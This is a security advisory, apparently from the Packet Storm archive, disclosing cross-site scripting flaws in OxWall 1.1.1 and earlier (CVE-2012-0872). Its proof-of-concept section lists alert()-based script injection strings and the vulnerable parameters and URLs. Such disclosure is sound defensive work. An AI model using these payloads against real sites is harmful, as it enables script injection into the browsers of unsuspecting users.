exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OxWall 1.1.1 Cross Site Scripting

OxWall 1.1.1 Cross Site Scripting
Posted Feb 21, 2012
Authored by Aung Khant | Site yehg.net

OxWall versions 1.1.1 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2012-0872
SHA-256 | aa17b9ab1afce80ee4812c2e458301ecc7578225189c2f5bf27a236830a31060

OxWall 1.1.1 Cross Site Scripting

Change Mirror Download
1. OVERVIEW

OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

1.1.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

URL: https://localhost/Oxwall/join

Injected Attack String: '"><script>alert(/XSS/)</script>
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name ,password
,realname ,repeatPassword ,username

------------------------------------------------------------------------------------

URL: https://localhost/Oxwall/contact

Injected Attack String: '"><script>alert(/XSS/)</script>
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name ,from , subject
------------------------------------------------------------------------------------

URL: https://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Vulnerable Parameter: tag

----------------------------------------------------------------------------

Vulnerable Parameter: RAW-URI

https://localhost/Oxwall/photo/viewlist/tagged/><img src=xs onerror=alert('XSS')>

https://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=

https://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=


6. SOLUTION

Upgade to the latest version of Oxwall.


7. VENDOR

Oxwall Foundation
https://www.oxwall.org/


8. CREDIT

Aung Khant, https://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
https://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
Oxwall Home Page: https://www.oxwall.org/


#yehg [2012-02-20]
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close